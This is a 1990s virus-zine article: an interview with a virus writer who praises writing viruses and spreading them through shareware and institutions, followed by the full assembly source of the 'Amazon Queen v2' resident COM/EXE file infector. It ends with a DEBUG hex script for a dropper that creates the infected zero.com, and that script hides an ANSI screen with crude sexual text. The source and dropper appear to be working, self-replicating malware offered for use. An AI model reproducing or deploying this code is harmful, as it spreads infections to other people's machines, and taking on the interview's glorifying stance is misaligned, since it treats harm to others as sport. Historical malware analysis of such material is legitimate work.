Here's a short interview with yet another swedish viruswriter, Lord Zero. One of his very old source-code follow this crappy interview wipped up in a few minutes it looks like :-). Lord Zer0 is the writer of Trojan Horse Maker, which never worked on my machine, but might work on some :-), and of viruses like Swedish_Warrior (included in IR#4) and others. I wish him good luck in the future and thank him for being swedish and writing viruses :-). - The Unforgiven. ================================================================================ TU> = The Unforgiven LZ> = Lord Zer0 TU> Give me a short description of who you are? LZ> - My name is Alexander Augustus Napoleon... TU> From where did you get you handle, Lord Zer0? LZ> - From my brain...hehe TU> Does your handle has some specific meaning? LZ> - Sure, It means "The LoRD over all the Zer0s" TU> When did you discovered the world of computers? LZ> - When I was ten and my daddy brought home a PC from his office. TU> How long have you been active in the scene? LZ> - Since summer '93. TU> Why did you start to call boards and such things? LZ> - " Fame is our greatest enemy. " TU> How did you came into the virus business? LZ> - I got a copy of "The little black book of virus" by Mark Ludwig and started experimenting with the "Timid" virus. TU> Why did you start to write viruses? LZ> - I've always liked to create things and if I could manage to create "living" things that's exactly what I want to do. TU> Which goals do you have as a viruswriter? LZ> - Well, one of my goals is to finish "C.I.V", "Computer Immune Virus" (EXE, WIN, MBR, maybe OS/2, Polymorphic(Gen_X), Stealth and a lots of Anti-AV.) TU> What programming-languages are you familiar with, and what's your favourite language? LZ> - I am familiar with Visual Basic, C, Quick Basic and Assembler. Assembler is outstanding. TU> You wrote a trojan-horse maker some while back, is that now finished project or have you plans to continue on it? LZ> - It's finished. The last version is 1.52. TU> Which responses have you had about it? LZ> - Well, I heard that it was spread like wildfire, many BBS's was fucked up, and there was a war in Finland. DN (the largest Swedish daily paper) got their Harddrives fuck-up. (L.o.C. also got blacklisted on Internet and stuff like that, so they had to change their name.) TU> Do you have any plans to write a virus-code generator? LZ> - Yes, I have one, which is nearly finished. (When I had the routine creating the infected files left to write I got tired but I'll probably finish it, one day, so stay alert.;) ) TU> Do you release viruses/trojans into public? LZ> - Of course not! ;) Actually, there are already too many of them out there, so a few of my NORMAL creations won't make any difference. No phun! The viruses which are released must include some new ideas or be very wide spead, to make someone notice them. TU> How many viruses has you written? LZ> - Ten maybe twenty, I don't really know(or care). TU> How do you name your viruses? LZ> - Well, in many different ways. I won't tell you..(I will require at least half a page.) TU> What motivates you to write viruses? LZ> - You would never ask an artist: "Why do you paint ?" TU> Do you think you will continue to write viruses? LZ> - Yes, I will. Today, I can't see the end. TU> Would you feel guilty if one of your viruses made damage to a hospital? LZ> - All my viruses are non-destructive. So don't blame me. (And use my software at your own risk...hehe.) TU> Would you deliberate infect a school or government institution if you know they would replicate well if you did so? LZ> - Yes, I think. If it could spread outside the institution. (I will not infect a close system.) TU> Do you find it easier to infect pirated software (which is illegal to use), than PD/SW software? LZ> - No, if I choose to infect a pirated software, I have to get something very new if I want many users to get infected. That's the big problem, and besides, elite users knows more about viruses than PD/SW people do. So if I'd try to spread a virus, I'd prefer to put it in a PD/SW. TU> Do you encourage deliberate destructive code in viruses? LZ> - No. (I wouldn't want to get my HD overwritten, and I think nobody likes that.) TU> Have you considered writing destructive code in viruses? LZ> - No, the highest goal of a virus is survival, so why then commit suicide, with trashing the HD? TU> What to you think of the issue concerning 'undestructive-viruses'? LZ> - I don't agree to it... A virus should be undestructive.. That's my opinion. TU> Do you think one can make a virus beneficial? LZ> - Sure, but then the "virus" is spelled: S O F T W A R E TU> Have you ever considered writing a GOOD virus? LZ> - Nope,...How can a virus be GOOD ? TU> Bontchev described in his 'write-up' "Is good Computer-Viruses still a bad idea", do you think one of those viruses can be classified good? LZ> - A virus, which search/watch for something or update a software, may be a beneficial virus. TU> Do you have any more arguments why viruses can't be beneficial than the one Bontchev mentioned in his article? LZ> - My arguments won't make anything different. There're too many problems to solve, and one or two more won't matter. TU> If you think its possible to write a good virus, how to solve the above problems? LZ> - Ask God ;) TU> About virus-code-generators, what is your opinion about them, and about people using them thinking they are hot-shot-eleete? LZ> - It's a good idea, but it's rather useless. I my opinion people using code-generators are lame or stupid. (They want to make a virus but can't or are too lame to write one..BaH!) LZ> Do you write viruses to get recognition in the virus/AV community? LZ> - No. I just write viruses, because I think it's fun. TU> What do you think about the media/AV describing viruswriters as lonely individuals with no life? LZ> - A person who can always do exactly what he wants without having to care about what people think has a FREE life. And about friends; I've got plenty of friends, friends who know things about myself and my virustechnique that I've only told them because I can trust them. For example the guys reading through this interview, my press staff...But... to the people who wants the truth: Make up your own opinion! TU> Do you think the scene is asocial or not? LZ> - It depends on what you make of it, doesn't it? TU> How are you in real life (in a private matter). LZ> - A highly respectable young man, who loves life and doing good at school, which means nothing.(It could be any boy/girl in sweden, who cares about the school.) TU> How do you make your living? LZ> - Nothing, just spend my parents money. TU> Have the scene/viruswriting influent you in real life? LZ> - Yes a bit, but not much. LZ> What do your parents/close friends thinks about your viruswriting? LZ> - Some of my friends know that I write viruses, but they believe that I won't spread my creations. I don't really know what my parents know about my virus writing, but I suspect they know what I'm doing and as long as I'm doing good at school, they won't care. They probably think that it's just a "game", which will die out in a couple of years. TU> Are you into viruswriting only or other parts of the computer-underground? LZ> - I crack games, and programs. I'm an elite trader (Under an other handle.) =============================================================================== % Amazon Queen v2 by Lord Zer0 % �������������������������������� Amazone Queen v2 is a memory resident infector of COM and EXE programs executed, opened (both normal and extended), or touched with the dos attrib-function, thus making this a pretty fast infector. It 're-vectors' interrupt 21h (dos) to be interrupt38h, marks exe-files with a '0' in the exe-header's negative checksum adress (12h - which ofcourse is ignored) and a few other thing... and yeah, it can bug, and there you go.. - The Unforgiven. ================================================================================ .model tiny .code org 100h start: push cs pop ds call begin begin: mov bx,sp mov bp,ss:[bx] sub bp,offset begin-100h inc sp inc sp push es inc [generation-100h+bp] mov ah,0ACh int 21h cmp al,'0' jnz go_tsr cmp bx,cs:[_version+bp-100h] jge return_file mov ah,0AEh ; uninstall Virus int 21h mov ah,9 ; Give the user a notice that s/he has got ; at least two viruses on the HD... lea dx,[bp+vx_name-100h] int 21h go_tsr: xor ax,ax mov es,ax mov di,200h mov si,bp mov cx,vx_size/2 rep movsw stosw stosw mov ds,cx mov ax,offset int_21+100h cli xchg ds:[21h*4],ax mov ds:[38h*4],ax mov ds:[oldint21+100h],ax xchg ds:[21h*4+2],cx mov ds:[38h*4+2],cx mov ds:[oldint21+102h],cx sti return_file: pop es push cs pop ds cmp sp,0FFFEh je ret_com push es pop ds mov ax,es add ax,10h add ax,word ptr cs:[bp+buffer+2-100h] push ax push word ptr cs:[bp+buffer-100h] retf buffer: int 20h db '00' ret_com: mov di,100h dec sp dec sp mov bx,sp mov [bx],di lea si,[bp+buffer-100h] movsw movsw xor ax,ax retn vx_name db ' Amazon Queen...v2.0$' uninstall: push ds lds dx,dword ptr cs:[oldint21+100h] mov ax,2521h int 21h pop ds installed: mov al,'0' mov bx,cs:[_version+100h] popf iret int_21: pushf cmp ah,0ach je installed cmp ah,0aeh je uninstall cmp ah,4bh je infect cmp ah,3dh je infect cmp ah,43h je infect cmp ah,6ch je infect return_dos: popf db 0eah oldint21 dw ?,? infect: call push_all cmp ah,6ch jne not_extended mov dx,si not_extended: push ds pop es mov di,dx mov al,'.' mov cx,64 repnz scasb mov ax,[di] or ax,2020h cmp ax,'oc' je comexe_file cmp ax,'xe' je comexe_file jmp pop_ret comexe_file: mov di,offset buffer+100h mov ax,3D02h int 38h jnc go_on jmp pop_ret go_on: xchg ax,bx push cs push cs pop es pop ds mov ah,3fh mov cx,18h mov dx,offset exe_hdr+100h mov si,dx int 38h jnc not_close jmp close db 'WHY?' not_close: call eof cmp word ptr [si],'ZM' je exe_file cmp byte ptr [si],41h jne no_close close_it: jmp close no_close: movsw movsw mov cx,4 sub ax,cx mov [si],0e941h mov [si+2],ax jmp write exe_file: push si add si,14h movsw movsw pop si cmp byte ptr [si+12h],'0' je close push ax push dx add ax,vx_size adc dx,0 mov cx,200h div cx or dx,dx jz same_page inc ax same_page: mov [si+2],dx mov [si+4],ax mov ax,[si+8] mov cl,4 shl ax,cl xchg ax,cx pop dx pop ax sub ax,cx sbb dx,0 mov cx,10h div cx mov byte ptr [si+12h],'0' mov [si+14h],dx mov [si+16h],ax mov cx,18h write: push cx mov ah,40h mov dx,200h mov cx,vx_size int 38h call tof pop cx mov ah,40h mov dx,si int 38h mov ax,5700h int 38h inc ax int 38h close: mov ah,3eh int 38h pop_ret: call pop_all jmp return_dos db 'LoRD Zer0' tof: xor al,al jmp movfptr eof: mov al,2 movfptr: mov ah,42h cwd xor cx,cx int 38h retn pop_all: pop word ptr cs:[where] pop di pop si pop ds pop es pop dx pop cx pop bx pop ax jmp jump_back push_all: pop word ptr cs:[where] push ax push bx push cx push dx push es push ds push si push di jump_back: jmp word ptr cs:[where] _version dw 200h generation dw 1 the_end: vx_size = $-offset start where = $+100h exe_hdr = $+102h end start ================================================================================ % An alternative script! % �������������������������� What follow is not exactly the virus (AQ.500), but a dropper which will create a file called zero.com. It does atleast contain one hidden area, like oh-so-many of the hex-scripts in this zine does. - The Unforgiven. N lord0.com E 100 EB 3B 0D 0A 50 72 6F 67 72 61 6D 20 6D 61 64 65 E 110 20 66 6F 72 20 49 52 37 2E 20 50 75 62 6C 69 73 E 120 68 65 64 20 62 79 20 49 6D 6D 6F 72 74 61 6C 20 E 130 52 69 6F 74 2C 20 31 39 39 35 21 0D 0A FA 33 ED E 140 B0 13 CD 10 BA DA 03 EC A8 08 74 FB B8 00 A0 8E E 150 C0 8E D8 B8 C0 EE B1 09 51 8B F0 8B F8 83 C6 02 E 160 B1 9F F3 A5 05 40 01 59 E2 EE 33 F6 B8 00 F0 8E E 170 C0 BB 6E FA 03 DD 26 8A 00 2E 22 06 FD 02 74 19 E 180 BB FC EF 33 FF 81 C3 40 01 47 3B F7 7D F7 8B CE E 190 80 C1 18 8A E9 89 0F 32 ED 46 83 FE 08 75 D2 0E E 1a0 1F D0 0E FD 02 80 3E FD 02 80 90 75 1C FF 06 FE E 1b0 02 8B 36 FE 02 8A 84 00 03 0A C0 75 06 31 36 FE E 1c0 02 EB EA B3 08 F6 E3 8B E8 E4 60 3C 80 72 03 E9 E 1d0 75 FF FB B8 03 00 CD 10 B8 00 B8 8E C0 BF 00 00 E 1e0 B9 96 03 FC BE 4F 03 E8 03 00 EB 6C 90 56 57 50 E 1f0 53 51 52 E3 5C 8B D7 33 C0 FC AC 3C 20 72 05 AB E 200 E2 F8 EB 4D 3C 10 73 07 80 E4 F0 0A E0 EB F1 3C E 210 18 74 13 73 19 2C 10 02 C0 02 C0 02 C0 02 C0 80 E 220 E4 8F 0A E0 EB DA 81 C2 A0 00 8B FA EB D2 3C 1B E 230 72 08 75 CC 80 F4 80 E9 A2 00 3C 19 8B D9 AC 8A E 240 C8 B0 20 74 02 AC 4B 32 ED 41 F3 AB 8B CB 49 E0 E 250 A9 5A 59 5B 58 5F 5E C3 B4 3C BA 2B 09 33 C9 CD E 260 21 B8 02 3D BA 2B 09 CD 21 8B D8 B4 40 B9 F4 01 E 270 BA 37 07 CD 21 B4 3E CD 21 B4 07 CD 21 3C 52 75 E 280 70 B8 03 00 CD 10 B4 09 BA 8F 02 CD 21 EB 2F 63 E 290 6C 65 61 72 69 6E 67 20 73 63 72 65 65 6E 20 6F E 2a0 6E 20 79 6F 75 72 20 6B 65 79 70 72 65 73 73 2E E 2b0 2E 2E 2E 20 20 77 68 6F 61 68 21 0D 0A 24 B4 07 E 2c0 CD 21 3C 49 75 2B B4 07 CD 21 3C 4F 75 23 B4 07 E 2d0 CD 21 3C 54 75 1B B9 04 00 BE F8 02 FE 04 46 E2 E 2e0 FB B4 09 BA F8 02 CD 21 BA 61 00 B8 03 00 EF CD E 2f0 20 B8 03 00 CD 10 CD 20 53 54 68 51 24 80 00 00 E 300 20 41 4D 41 5A 4F 4E 20 51 55 45 45 4E 20 56 32 E 310 2E 30 20 28 43 29 20 4C 4F 52 44 20 5A 45 52 30 E 320 2E 2E 2E 2E 2E 2E 20 20 48 45 52 4D 41 4E 4E 49 E 330 20 42 4C 4F 57 53 20 47 4F 41 54 2D 44 49 43 4B E 340 21 21 21 20 20 20 20 20 20 20 20 20 20 20 00 0F E 350 10 18 20 07 1A 09 DC 0F DC 19 02 07 1A 06 DC 0F E 360 DC 19 05 07 1A 09 DC 0F DC 19 02 07 1A 09 DC 0F E 370 DC 20 20 07 1A 08 DC 0F DC 19 02 07 1A 08 DC 0F E 380 DC 18 07 DB 19 08 DE 0F 17 DE 10 DD 20 07 DB 19 E 390 06 DF 0F 17 DF 10 DC 19 02 07 DC DF 19 07 DE 0F E 3a0 17 DE 10 DD 20 07 DC DF 19 07 DE 0F 17 DE 10 DD E 3b0 07 DB 19 08 DB 0F DB 20 07 DB 19 08 DB 0F DB 18 E 3c0 07 DB 20 20 DB 0F 17 DC 07 10 1A 04 DF DC 0F 17 E 3d0 DC 10 DF 20 07 DB 20 20 DB 0F 17 DC 07 10 DF DB E 3e0 DF 20 20 DB 0F DB 20 20 07 DB 20 20 DB 0F 17 DC E 3f0 07 10 1A 04 DF DC 0F 17 DC 10 DF 20 07 DB 20 20 E 400 DB 0F 17 DC 07 10 1A 04 DF DC 0F 17 DC 10 DF 20 E 410 07 DF DF DF DB 20 20 DB 0F 17 DC 07 10 DF 0F DF E 420 20 07 DB 19 02 DC 0F 17 DC 07 10 1A 04 DF 0F DF E 430 18 07 DB 20 20 DB 0F DB 19 08 07 DB 20 20 DB 0F E 440 17 DF 07 10 DF 20 DF DC 0F 17 DC 10 DF 19 02 07 E 450 DB 20 20 1A 03 DF DB 0F DB 19 04 07 DB 20 20 1A E 460 03 DF DB 0F DB 19 07 07 DB 20 20 DB 0F DB 19 03 E 470 07 DB 19 02 DB 0F DB 18 07 DB 20 20 DB 0F DB 20 E 480 00 DC 07 DC DF DF DF 0F 17 DF 10 DC 20 07 DB 01 E 490 DB DB 17 DC 10 DB 17 DF 0F DC 01 DF DB DC 0F DF E 4a0 10 DC 20 20 07 DB 01 DB DB 07 DB 0F 17 DC 07 10 E 4b0 DF DF DF 0F 17 DF 07 10 DC 01 17 DC 0F DF 10 DC E 4c0 20 07 DB 01 DB DB 07 DB 0F 17 DC 07 10 DF DF DF E 4d0 0F 17 DF 07 10 DC 01 17 DC 0F DF 10 DC 19 03 07 E 4e0 DB 01 DB DB 07 DB 0F DB 19 04 07 DB 01 DB DB DB E 4f0 07 DF DF DF 0F 17 DF 07 10 DC 0F DC 18 07 DB 01 E 500 DB DB 07 DB 0F DB 20 20 07 DF DC 01 DB DB 07 DB E 510 0F DB 20 07 DB 01 B1 B1 08 DC 0F 17 DC 10 20 20 E 520 07 DE 01 17 DE 10 B1 17 DD 0F DE 10 DD 20 07 DB E 530 01 B1 B1 07 1A 04 DF 01 B1 B1 B0 07 DE 0F 17 DE E 540 10 DD 07 DB 01 B1 B1 07 1A 04 DF 01 B1 B1 B1 07 E 550 DE 0F 17 DE 10 DD 19 02 07 DB 01 B1 B1 07 DB 0F E 560 DB 19 05 07 DF DF DC 01 1A 04 B1 07 DB 0F DB 18 E 570 07 DB 01 B1 B1 B1 0F 17 DF 07 10 DC DC DC DF 01 E 580 B1 B1 07 DB 0F DB 20 07 DB 20 08 DC 0F 17 DF 10 E 590 19 02 07 DB 01 B1 B1 07 DB 0F 17 DB 10 19 02 07 E 5a0 DB 1A 07 DC DB 0F 17 DB 10 19 02 07 DB 1A 07 DC E 5b0 DB 0F 17 DB 10 19 04 07 DB 01 B0 B0 07 DB 0F DB E 5c0 19 03 07 1A 03 DC DF 01 1A 03 B0 07 DC 0F 17 DC E 5d0 10 DF 18 07 DB 01 1A 09 B0 07 DB 0F DB 20 20 07 E 5e0 DF 19 04 DF DC 01 B0 B0 07 DF 0F 17 DF DC 10 DF E 5f0 19 1D 07 DF DC DC 0F 17 DC 10 DF 20 20 07 DC DB E 600 1A 06 DC 0F 17 DC 10 DF 18 07 DF 1A 08 DC 0F 17 E 610 DC 10 DF 19 0A 07 DF DF DF 0F DF 18 18 18 18 19 E 620 0A 09 D2 19 03 D6 C4 C4 BF 20 D2 C4 C4 BF 20 D2 E 630 C4 C4 BF 19 04 D6 C4 BF 20 20 D2 C4 C4 BF 20 D2 E 640 C4 C4 BF 20 D6 C4 C4 BF 20 D2 18 19 0A BA 19 03 E 650 BA 20 20 B3 20 C7 C4 C2 D9 20 BA 20 20 B3 19 04 E 660 D6 C4 D9 20 20 C7 C4 19 02 C7 C4 C2 D9 20 BA 20 E 670 20 B3 20 BA 18 19 0A D0 C4 C4 D9 20 D3 C4 C4 D9 E 680 20 D0 20 C1 20 20 D0 C4 C4 D9 19 04 D3 C4 C4 D9 E 690 20 D0 C4 C4 D9 20 D0 20 C1 20 20 D3 C4 C4 D9 20 E 6a0 6F 18 18 18 19 17 0B C4 54 48 45 20 55 4E 46 4F E 6b0 52 47 49 56 45 4E 2D 18 18 19 0C 28 41 4E 53 49 E 6c0 20 42 59 20 50 4F 52 4E 4F 20 2D 20 41 47 45 53 E 6d0 20 41 47 4F 2E 2E 2E 20 21 20 21 20 21 20 21 29 E 6e0 18 18 18 18 18 54 55 3E 20 48 69 20 45 6D 6D 61 E 6f0 2C 20 73 63 68 75 74 74 75 70 20 61 6E 64 20 73 E 700 6C 65 65 70 20 77 69 74 68 20 6D 65 21 0D 0A 62 E 710 63 6F 73 20 79 6F 75 20 61 72 65 20 79 6F 75 6E E 720 67 20 61 6E 64 20 68 61 76 65 20 61 20 70 75 73 E 730 73 79 21 21 21 0D 0A 0E 1F E8 00 00 8B DC 36 8B E 740 2F 81 ED 05 00 44 44 06 FF 86 F2 01 B4 AC CD 21 E 750 3C 30 75 13 2E 3B 9E F0 01 7D 39 B4 AE CD 21 B4 E 760 09 8D 96 8E 00 CD 21 33 C0 8E C0 BF 00 02 8B F5 E 770 B9 FA 00 F3 A5 AB AB 8E D9 B8 B8 02 FA 87 06 84 E 780 00 A3 E0 00 A3 D9 02 87 0E 86 00 89 0E E2 00 89 E 790 0E DB 02 FB 07 0E 1F 83 FC FE 74 17 06 1F 8C C0 E 7a0 05 10 00 2E 03 86 7A 00 50 2E FF B6 78 00 CB CD E 7b0 20 30 30 BF 00 01 4C 4C 8B DC 89 3F 8D B6 78 00 E 7c0 A5 A5 33 C0 C3 20 41 6D 61 7A 6F 6E 20 51 75 65 E 7d0 65 6E 2E 2E 2E 76 32 2E 30 24 1E 2E C5 16 D9 02 E 7e0 B8 21 25 CD 21 1F B0 30 2E 8B 1E F0 03 9D CF 9C E 7f0 80 FC AC 74 F1 80 FC AE 74 E0 80 FC 4B 74 15 80 E 800 FC 3D 74 10 80 FC 43 74 0B 80 FC 6C 74 06 9D EA E 810 00 00 00 00 E8 FE 00 80 FC 6C 75 02 8B D6 1E 07 E 820 8B FA B0 2E B9 40 00 F2 AE 8B 05 0D 20 20 3D 63 E 830 6F 74 08 3D 65 78 74 03 E9 AE 00 BF 78 02 B8 02 E 840 3D CD 38 73 03 E9 A1 00 93 0E 0E 07 1F B4 3F B9 E 850 18 00 BA F6 04 8B F2 CD 38 73 07 E9 87 00 57 48 E 860 59 3F E8 97 00 81 3C 4D 5A 74 17 80 3C 41 75 02 E 870 EB 73 A5 A5 B9 04 00 2B C1 C7 04 41 E9 89 44 02 E 880 EB 46 56 83 C6 14 A5 A5 5E 80 7C 12 30 74 56 50 E 890 52 05 F4 01 83 D2 00 B9 00 02 F7 F1 0B D2 74 01 E 8a0 40 89 54 02 89 44 04 8B 44 08 B1 04 D3 E0 91 5A E 8b0 58 2B C1 83 DA 00 B9 10 00 F7 F1 C6 44 12 30 89 E 8c0 54 14 89 44 16 B9 18 00 51 B4 40 BA 00 02 B9 F4 E 8d0 01 CD 38 E8 22 00 59 B4 40 8B D6 CD 38 B8 00 57 E 8e0 CD 38 40 CD 38 B4 3E CD 38 E8 1A 00 E9 1F FF 4C E 8f0 6F 52 44 20 5A 65 72 30 32 C0 EB 02 B0 02 B4 42 E 900 99 33 C9 CD 38 C3 2E 8F 06 F4 03 5F 5E 1F 07 5A E 910 59 5B 58 EB 0D 2E 8F 06 F4 03 50 53 51 52 06 1E E 920 56 57 2E FF 26 F4 03 00 02 01 00 7A 65 72 6F 2E E 930 63 6F 6D 00 RCX 834 W Q